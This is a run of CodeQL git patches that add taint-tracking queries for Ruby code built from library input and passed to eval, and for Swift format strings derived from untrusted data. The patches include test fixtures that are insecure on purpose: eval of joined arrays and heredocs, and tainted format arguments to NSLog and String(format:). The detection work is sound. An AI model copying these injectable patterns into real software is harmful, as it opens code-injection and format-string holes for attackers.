impl/unsafeCode.rb:13:33:13:33 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:12:12:12:12 | x | library input | impl/unsafeCode.rb:13:5:13:35 | call to eval | interpreted as code | +| impl/unsafeCode.rb:29:10:29:15 | my_arr | impl/unsafeCode.rb:28:17:28:22 | my_arr : | impl/unsafeCode.rb:29:10:29:15 | my_arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:28:17:28:22 | my_arr | library input | impl/unsafeCode.rb:29:5:29:27 | call to eval | interpreted as code | diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb index d7d720d5d32..ca3605ec050 100644 --- a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb @@ -24,4 +24,11 @@ class Foobar def named_code(code) foo.send("def \n #{code} \n end") # OK - parameter is named code end + + def joinStuff(my_arr) + eval(my_arr.join("\n")) # NOT OK + end + + # TODO: [x, y].join("\n") is not yet supported + # TODO: list << element. end From 80c92dc3e65a07a75f487a9b0ddcdfe8ca3e09cf Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Thu, 24 Nov 2022 17:47:03 +0100 Subject: [PATCH 009/381] add support for array pushes --- .../security/UnsafeCodeConstructionQuery.qll | 16 ++++++++++++++++ .../UnsafeCodeConstruction.expected | 11 +++++++++++ .../UnsafeCodeConstruction/impl/unsafeCode.rb | 16 ++++++++++++++-- 3 files changed, 41 insertions(+), 2 deletions(-) diff --git a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionQuery.qll b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionQuery.qll index 4b27a258716..a5670a783e4 100644 --- a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionQuery.qll +++ b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionQuery.qll @@ -30,4 +30,20 @@ class Configuration extends TaintTracking::Configuration { override DataFlow::FlowFeature getAFeature() { result instanceof DataFlow::FeatureHasSourceCallContext } + + override predicate isAdditionalTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + // if an array element gets tainted, then we treat the entire array as tainted + exists(DataFlow::CallNode call | + call.getMethodName() = ["<<", "push", "append"] and + call.getReceiver() = succ and + pred = call.getArgument(0) and + call.getNumberOfArguments() = 1 + ) + or + exists(DataFlow::CallNode call | + call.getMethodName() = "[]" and + succ = call and + pred = call.getArgument(_) + ) + } } diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected index 1f4d4e33719..ffc53d43faf 100644 --- a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected @@ -3,6 +3,9 @@ edges | impl/unsafeCode.rb:7:12:7:12 | x : | impl/unsafeCode.rb:8:30:8:30 | x | | impl/unsafeCode.rb:12:12:12:12 | x : | impl/unsafeCode.rb:13:33:13:33 | x | | impl/unsafeCode.rb:28:17:28:22 | my_arr : | impl/unsafeCode.rb:29:10:29:15 | my_arr | +| impl/unsafeCode.rb:32:21:32:21 | x : | impl/unsafeCode.rb:34:10:34:12 | arr | +| impl/unsafeCode.rb:37:15:37:15 | x : | impl/unsafeCode.rb:40:10:40:12 | arr | +| impl/unsafeCode.rb:37:15:37:15 | x : | impl/unsafeCode.rb:44:10:44:12 | arr | nodes | impl/unsafeCode.rb:2:12:2:17 | target : | semmle.label | target : | | impl/unsafeCode.rb:3:17:3:25 | #{...} | semmle.label | #{...} | @@ -12,9 +15,17 @@ nodes | impl/unsafeCode.rb:13:33:13:33 | x | semmle.label | x | | impl/unsafeCode.rb:28:17:28:22 | my_arr : | semmle.label | my_arr : | | impl/unsafeCode.rb:29:10:29:15 | my_arr | semmle.label | my_arr | +| impl/unsafeCode.rb:32:21:32:21 | x : | semmle.label | x : | +| impl/unsafeCode.rb:34:10:34:12 | arr | semmle.label | arr | +| impl/unsafeCode.rb:37:15:37:15 | x : | semmle.label | x : | +| impl/unsafeCode.rb:40:10:40:12 | arr | semmle.label | arr | +| impl/unsafeCode.rb:44:10:44:12 | arr | semmle.label | arr | subpaths #select | impl/unsafeCode.rb:3:17:3:25 | #{...} | impl/unsafeCode.rb:2:12:2:17 | target : | impl/unsafeCode.rb:3:17:3:25 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:2:12:2:17 | target | library input | impl/unsafeCode.rb:3:5:3:27 | call to eval | interpreted as code | | impl/unsafeCode.rb:8:30:8:30 | x | impl/unsafeCode.rb:7:12:7:12 | x : | impl/unsafeCode.rb:8:30:8:30 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:7:12:7:12 | x | library input | impl/unsafeCode.rb:8:5:8:32 | call to eval | interpreted as code | | impl/unsafeCode.rb:13:33:13:33 | x | impl/unsafeCode.rb:12:12:12:12 | x : | impl/unsafeCode.rb:13:33:13:33 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:12:12:12:12 | x | library input | impl/unsafeCode.rb:13:5:13:35 | call to eval | interpreted as code | | impl/unsafeCode.rb:29:10:29:15 | my_arr | impl/unsafeCode.rb:28:17:28:22 | my_arr : | impl/unsafeCode.rb:29:10:29:15 | my_arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:28:17:28:22 | my_arr | library input | impl/unsafeCode.rb:29:5:29:27 | call to eval | interpreted as code | +| impl/unsafeCode.rb:34:10:34:12 | arr | impl/unsafeCode.rb:32:21:32:21 | x : | impl/unsafeCode.rb:34:10:34:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:32:21:32:21 | x | library input | impl/unsafeCode.rb:34:5:34:24 | call to eval | interpreted as code | +| impl/unsafeCode.rb:40:10:40:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x : | impl/unsafeCode.rb:40:10:40:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:40:5:40:24 | call to eval | interpreted as code | +| impl/unsafeCode.rb:44:10:44:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x : | impl/unsafeCode.rb:44:10:44:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:44:5:44:24 | call to eval | interpreted as code | diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb index ca3605ec050..dac4703abda 100644 --- a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb @@ -29,6 +29,18 @@ class Foobar eval(my_arr.join("\n")) # NOT OK end - # TODO: [x, y].join("\n") is not yet supported - # TODO: list << element. + def joinWithElemt(x) + arr = [x, "foobar"] + eval(arr.join("\n")) # NOT OK + end + + def pushArr(x, y) + arr = [] + arr.push(x) + eval(arr.join("\n")) # NOT OK + + arr2 = [] + arr2 << y + eval(arr.join("\n")) # NOT OK + end end From 378cc1aed2e17589235d0bcb102f367cef5b30d8 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Thu, 24 Nov 2022 18:01:54 +0100 Subject: [PATCH 010/381] add support for string-like-literals --- .../ruby/security/UnsafeCodeConstructionCustomizations.qll | 2 +- .../UnsafeCodeConstruction/UnsafeCodeConstruction.expected | 4 ++++ .../cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb | 7 +++++++ 3 files changed, 12 insertions(+), 1 deletion(-) diff --git a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll index 559a21f761a..4599179db5c 100644 --- a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll +++ b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll @@ -84,7 +84,7 @@ module UnsafeCodeConstruction { Concepts::CodeExecution s; StringFormatAsSink() { - exists(Ast::StringLiteral lit | + exists(Ast::StringlikeLiteral lit | any(DataFlow::Node n | n.asExpr().getExpr() = lit) = getANodeExecutedAsCode(s) and this.asExpr().getExpr() = lit.getComponent(_) ) diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected index ffc53d43faf..5b7cd78cca3 100644 --- a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected @@ -6,6 +6,7 @@ edges | impl/unsafeCode.rb:32:21:32:21 | x : | impl/unsafeCode.rb:34:10:34:12 | arr | | impl/unsafeCode.rb:37:15:37:15 | x : | impl/unsafeCode.rb:40:10:40:12 | arr | | impl/unsafeCode.rb:37:15:37:15 | x : | impl/unsafeCode.rb:44:10:44:12 | arr | +| impl/unsafeCode.rb:47:15:47:15 | x : | impl/unsafeCode.rb:49:9:49:12 | #{...} | nodes | impl/unsafeCode.rb:2:12:2:17 | target : | semmle.label | target : | | impl/unsafeCode.rb:3:17:3:25 | #{...} | semmle.label | #{...} | @@ -20,6 +21,8 @@ nodes | impl/unsafeCode.rb:37:15:37:15 | x : | semmle.label | x : | | impl/unsafeCode.rb:40:10:40:12 | arr | semmle.label | arr | | impl/unsafeCode.rb:44:10:44:12 | arr | semmle.label | arr | +| impl/unsafeCode.rb:47:15:47:15 | x : | semmle.label | x : | +| impl/unsafeCode.rb:49:9:49:12 | #{...} | semmle.label | #{...} | subpaths #select | impl/unsafeCode.rb:3:17:3:25 | #{...} | impl/unsafeCode.rb:2:12:2:17 | target : | impl/unsafeCode.rb:3:17:3:25 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:2:12:2:17 | target | library input | impl/unsafeCode.rb:3:5:3:27 | call to eval | interpreted as code | @@ -29,3 +32,4 @@ subpaths | impl/unsafeCode.rb:34:10:34:12 | arr | impl/unsafeCode.rb:32:21:32:21 | x : | impl/unsafeCode.rb:34:10:34:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:32:21:32:21 | x | library input | impl/unsafeCode.rb:34:5:34:24 | call to eval | interpreted as code | | impl/unsafeCode.rb:40:10:40:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x : | impl/unsafeCode.rb:40:10:40:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:40:5:40:24 | call to eval | interpreted as code | | impl/unsafeCode.rb:44:10:44:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x : | impl/unsafeCode.rb:44:10:44:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:44:5:44:24 | call to eval | interpreted as code | +| impl/unsafeCode.rb:49:9:49:12 | #{...} | impl/unsafeCode.rb:47:15:47:15 | x : | impl/unsafeCode.rb:49:9:49:12 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:47:15:47:15 | x | library input | impl/unsafeCode.rb:51:5:51:13 | call to eval | interpreted as code | diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb index dac4703abda..64bba0aadc6 100644 --- a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb @@ -43,4 +43,11 @@ class Foobar arr2 << y eval(arr.join("\n")) # NOT OK end + + def hereDoc(x) + foo = <<~HERE + #{x} + HERE + eval(foo) # NOT OK + end end From 0817238177ec1c818a05d69c0c633154cb65c9d4 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Thu, 24 Nov 2022 18:02:27 +0100 Subject: [PATCH 011/381] drive-by: same change in unsafe-shell-command-construction --- .../security/UnsafeShellCommandConstructionCustomizations.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ruby/ql/lib/codeql/ruby/security/UnsafeShellCommandConstructionCustomizations.qll b/ruby/ql/lib/codeql/ruby/security/UnsafeShellCommandConstructionCustomizations.qll index 88e9625c822..d4fa74cab89 100644 --- a/ruby/ql/lib/codeql/ruby/security/UnsafeShellCommandConstructionCustomizations.qll +++ b/ruby/ql/lib/codeql/ruby/security/UnsafeShellCommandConstructionCustomizations.qll @@ -67,7 +67,7 @@ module UnsafeShellCommandConstruction { */ class StringInterpolationAsSink extends Sink { Concepts::SystemCommandExecution s; - Ast::StringLiteral lit; + Ast::StringlikeLiteral lit; StringInterpolationAsSink() { isUsedAsShellCommand(any(DataFlow::Node n | n.asExpr().getExpr() = lit), s) and From 53f24a528147d52173e788f7fae0d79290013a2f Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Thu, 24 Nov 2022 18:28:42 +0100 Subject: [PATCH 012/381] fix QL-for-QL warning --- .../security/UnsafeCodeConstructionCustomizations.qll | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll index 4599179db5c..b6c9c3b5219 100644 --- a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll +++ b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll @@ -62,13 +62,14 @@ module UnsafeCodeConstruction { */ class ArrayJoin extends Sink { Concepts::CodeExecution s; - DataFlow::CallNode call; ArrayJoin() { - call.getMethodName() = "join" and - call.getNumberOfArguments() = 1 and // any string. E.g. ";" or "\n". - call = getANodeExecutedAsCode(s) and - this = call.getReceiver() + exists(DataFlow::CallNode call | + call.getMethodName() = "join" and + call.getNumberOfArguments() = 1 and // any string. E.g. ";" or "\n". + call = getANodeExecutedAsCode(s) and + this = call.getReceiver() + ) } override DataFlow::Node getCodeSink() { result = s } From f75b853ae40f1d5f5a98f4d1c3d14d5732a30988 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Fri, 25 Nov 2022 11:08:14 +0100 Subject: [PATCH 013/381] add change-note --- .../src/change-notes/2022-11-25-unsafe-code-construction.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 ruby/ql/src/change-notes/2022-11-25-unsafe-code-construction.md diff --git a/ruby/ql/src/change-notes/2022-11-25-unsafe-code-construction.md b/ruby/ql/src/change-notes/2022-11-25-unsafe-code-construction.md new file mode 100644 index 00000000000..485a902693b --- /dev/null +++ b/ruby/ql/src/change-notes/2022-11-25-unsafe-code-construction.md @@ -0,0 +1,4 @@ +--- +category: newQuery +--- +* Added a new query, `rb/unsafe-code-construction`, to detect libraries that unsafely construct code from their inputs. From fd7442868f7a90ae221db5bf27dd1fd10e7dc936 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Mon, 28 Nov 2022 13:45:24 +0100 Subject: [PATCH 014/381] fix copy-pate error in UnsafeCodeConstructionQuery.qll --- .../ql/lib/codeql/ruby/security/UnsafeCodeConstructionQuery.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionQuery.qll b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionQuery.qll index a5670a783e4..68e8c56100c 100644 --- a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionQuery.qll +++ b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionQuery.qll @@ -12,7 +12,7 @@ private import codeql.ruby.TaintTracking private import codeql.ruby.dataflow.BarrierGuards /** - * A taint-tracking configuration for detecting shell command constructed from library input vulnerabilities. + * A taint-tracking configuration for detecting code constructed from library input vulnerabilities. */ class Configuration extends TaintTracking::Configuration { Configuration() { this = "UnsafeShellCommandConstruction" } From a2210959b5f0cfe51ab5d575e303ffa5afc46f8f Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 17 Nov 2022 13:57:14 +0000 Subject: [PATCH 015/381] Swift: Uncontrolled format string query (initial version). --- .../CWE-134/UncontrolledFormatString.ql | 105 ++++++++++++++++++ 1 file changed, 105 insertions(+) create mode 100644 swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql diff --git a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql new file mode 100644 index 00000000000..e4c7049fdb2 --- /dev/null +++ b/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.ql @@ -0,0 +1,105 @@ +/** + * @name Uncontrolled format string + * @description TODO + * @kind path-problem + * @problem.severity TODO + * @security-severity TODO + * @precision TODO + * @id swift/uncontrolled-format-string + * @tags security + * external/cwe/cwe-134 + */ + +import swift +import codeql.swift.dataflow.DataFlow +import codeql.swift.dataflow.TaintTracking +import codeql.swift.dataflow.FlowSources +import DataFlow::PathGraph +import swift + +/** + * A function that takes a `printf` style format argument. + */ +abstract class FormattingFunction extends AbstractFunctionDecl { + /** + * Gets the position of the format argument. + */ + abstract int getFormatParameterIndex(); +} + +/** + * An initializer for `String`, `NSString` or `NSMutableString` that takes a + * `printf` style format argument. + */ +class StringInitWithFormat extends FormattingFunction, MethodDecl { + StringInitWithFormat() { + exists(string fName | + this.hasQualifiedName(["String", "NSString", "NSMutableString"], fName) and + fName.matches("init(format:%") + ) + } + + override int getFormatParameterIndex() { result = 0 } +} + +/** + * The `localizedStringWithFormat` method of `String`, `NSString` and `NSMutableString`. + */ +class LocalizedStringWithFormat extends FormattingFunction, MethodDecl { + LocalizedStringWithFormat() { + this.hasQualifiedName(["String", "NSString", "NSMutableString"], + "localizedStringWithFormat(_:_:)") + } + + override int getFormatParameterIndex() { result = 0 } +} + +/** + * The functions `NSLog` and `NSLogv`. + */ +class NsLog extends FormattingFunction, FreeFunctionDecl { + NsLog() { this.getName() = ["NSLog(_:_:)", "NSLogv(_:_:)"] } + + override int getFormatParameterIndex() { result = 0 } +} + +/** + * The `NSException.raise` method. + */ +class NsExceptionRaise extends FormattingFunction, MethodDecl { + NsExceptionRaise() { this.hasQualifiedName("NSException", "raise(_:format:arguments:)") } + + override int getFormatParameterIndex() { result = 1 } +} + +/** + * A call to a function that takes a `printf` style format argument. + */ +class FormattingFunctionCall extends CallExpr { + FormattingFunction target; + + FormattingFunctionCall() { target = this.getStaticTarget() } + + /** + * Gets the format expression used in this call. + */ + Expr getFormat() { result = this.getArgument(target.getFormatParameterIndex()).getExpr() } +} + +/** + * A taint configuration for tainted data that reaches a format string. + */ +class TaintedFormatConfiguration extends TaintTracking::Configuration { + TaintedFormatConfiguration() { this = "TaintedFormatConfiguration" } + + override predicate isSource(DataFlow::Node node) { node instanceof FlowSource } + + override predicate isSink(DataFlow::Node node) { + node.asExpr() = any(FormattingFunctionCall fc).getFormat() + } +} + +from TaintedFormatConfiguration config, DataFlow::PathNode sourceNode, DataFlow::PathNode sinkNode +where config.hasFlowPath(sourceNode, sinkNode) +select sinkNode.getNode(), sourceNode, sinkNode, "This format string is derived from a $@.", + sourceNode.getNode(), "user-provided value" From 32c4728f83a93e7fd3e900408119c2e473fad66f Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 18 Nov 2022 13:06:28 +0000 Subject: [PATCH 016/381] Swift: Add tests. --- .../CWE-134/UncontrolledFormatString.expected | 32 ++++++ .../CWE-134/UncontrolledFormatString.qlref | 1 + .../CWE-134/UncontrolledFormatString.swift | 98 +++++++++++++++++++ 3 files changed, 131 insertions(+) create mode 100644 swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected create mode 100644 swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.qlref create mode 100644 swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected new file mode 100644 index 00000000000..56aaf090d4a --- /dev/null +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected @@ -0,0 +1,32 @@ +edges +| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:68:28:68:28 | tainted | +| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:71:28:71:28 | tainted | +| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:72:28:72:28 | tainted | +| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:74:28:74:28 | tainted | +| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:75:28:75:28 | tainted | +| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:76:28:76:28 | tainted | +| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:77:46:77:46 | tainted | +| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:86:11:86:11 | tainted | +| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:89:61:89:61 | tainted | +nodes +| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | semmle.label | call to init(contentsOf:) : | +| UncontrolledFormatString.swift:68:28:68:28 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:71:28:71:28 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:72:28:72:28 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:74:28:74:28 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:75:28:75:28 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:76:28:76:28 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:77:46:77:46 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:86:11:86:11 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:89:61:89:61 | tainted | semmle.label | tainted | +subpaths +#select +| UncontrolledFormatString.swift:68:28:68:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:68:28:68:28 | tainted | This format string is derived from a $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | user-provided value | +| UncontrolledFormatString.swift:71:28:71:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:71:28:71:28 | tainted | This format string is derived from a $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | user-provided value | +| UncontrolledFormatString.swift:72:28:72:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:72:28:72:28 | tainted | This format string is derived from a $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | user-provided value | +| UncontrolledFormatString.swift:74:28:74:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:74:28:74:28 | tainted | This format string is derived from a $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | user-provided value | +| UncontrolledFormatString.swift:75:28:75:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:75:28:75:28 | tainted | This format string is derived from a $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | user-provided value | +| UncontrolledFormatString.swift:76:28:76:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:76:28:76:28 | tainted | This format string is derived from a $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | user-provided value | +| UncontrolledFormatString.swift:77:46:77:46 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:77:46:77:46 | tainted | This format string is derived from a $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | user-provided value | +| UncontrolledFormatString.swift:86:11:86:11 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:86:11:86:11 | tainted | This format string is derived from a $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | user-provided value | +| UncontrolledFormatString.swift:89:61:89:61 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:89:61:89:61 | tainted | This format string is derived from a $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.qlref b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.qlref new file mode 100644 index 00000000000..115fef47e47 --- /dev/null +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.qlref @@ -0,0 +1 @@ +queries/Security/CWE-134/UncontrolledFormatString.ql \ No newline at end of file diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift new file mode 100644 index 00000000000..3536bee3954 --- /dev/null +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift @@ -0,0 +1,98 @@ + +// --- stubs --- + +struct URL +{ + init?(string: String) {} +} + +struct Locale { +} + +extension String : CVarArg { + public var _cVarArgEncoding: [Int] { get { return [] } } + + init(contentsOf: URL) throws { self.init() } + init(format: String, _ arguments: CVarArg...) { self.init() } + init(format: String, arguments: [CVarArg]) { self.init() } + init(format: String, locale: Locale?, _ args: CVarArg...) { self.init() } + init(format: String, locale: Locale?, arguments: [CVarArg]) { self.init() } + + static func localizedStringWithFormat(_ format: String, _ arguments: CVarArg...) -> String { return "" } +} + +class NSObject +{ +} + +class NSString : NSObject +{ + init(string aString: String) {} + init(format: NSString, _ args: CVarArg...) {} + + class func localizedStringWithFormat(_ format: NSString, _ args: CVarArg...) {} +} + +class NSMutableString : NSString +{ +} + +struct NSExceptionName { + init(_ rawValue: String) {} +} + +class NSException: NSObject +{ + class func raise(_ name: NSExceptionName, format: String, arguments argList: CVaListPointer) {} +} + +func NSLog(_ format: String, _ args: CVarArg...) {} + +func NSLogv(_ format: String, _ args: CVaListPointer) {} + +// --- tests --- + +func MyLog(_ format: String, _ args: CVarArg...) { + withVaList(args) { arglist in + NSLogv(format, arglist) // BAD [NOT DETECTED] + } +} + +func tests() { + let tainted = try! String(contentsOf: URL(string: "http://example.com")!) + + let a = String("abc") // GOOD: not a format string + let b = String(tainted) // GOOD: not a format string + + let c = String(format: "abc") // GOOD: not tainted + let d = String(format: tainted) // BAD + let e = String(format: "%s", "abc") // GOOD: not tainted + let f = String(format: "%s", tainted) // GOOD: format string itself is not tainted + let g = String(format: tainted, "abc") // BAD + let h = String(format: tainted, tainted) // BAD + + let i = String(format: tainted, arguments: []) // BAD + let j = String(format: tainted, locale: nil) // BAD + let k = String(format: tainted, locale: nil, arguments: []) // BAD + let l = String.localizedStringWithFormat(tainted) // BAD + + let m = NSString(format: NSString(string: tainted), "abc") // BAD [NOT DETECTED] + let n = NSString.localizedStringWithFormat(NSString(string: tainted)) // BAD [NOT DETECTED] + + var o = NSMutableString(format: NSString(string: tainted), "abc") // BAD [NOT DETECTED] + var p = NSMutableString.localizedStringWithFormat(NSString(string: tainted)) // BAD [NOT DETECTED] + + NSLog("abc") // GOOD: not tainted + NSLog(tainted) // BAD + MyLog(tainted) // BAD [NOT DETECTED] + + NSException.raise(NSExceptionName("exception"), format: tainted, arguments: getVaList([])) // BAD + + let taintedVal = Int(tainted)! + let taintedSan = "\(taintedVal)" + let q = String(format: taintedSan) // GOOD: sufficiently sanitized + + let taintedVal2 = Int(tainted) ?? 0 + let taintedSan2 = String(taintedVal2) + let r = String(format: taintedSan2) // GOOD: sufficiently sanitized +} From 2b61f26a6404b426260e5ce90e121cc9813c14e5 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 18 Nov 2022 15:07:54 +0000 Subject: [PATCH 017/381] Swift: Add doc. --- .../CWE-134/UncontrolledFormatString.qhelp | 39 +++++++++++++++++++ .../CWE-134/UncontrolledFormatStringBad.swift | 2 + .../UncontrolledFormatStringGood.swift | 2 + 3 files changed, 43 insertions(+) create mode 100644 swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.qhelp create mode 100644 swift/ql/src/queries/Security/CWE-134/UncontrolledFormatStringBad.swift create mode 100644 swift/ql/src/queries/Security/CWE-134/UncontrolledFormatStringGood.swift diff --git a/swift/ql/src/queries/Security/CWE-134/UncontrolledFormatString.qhelp 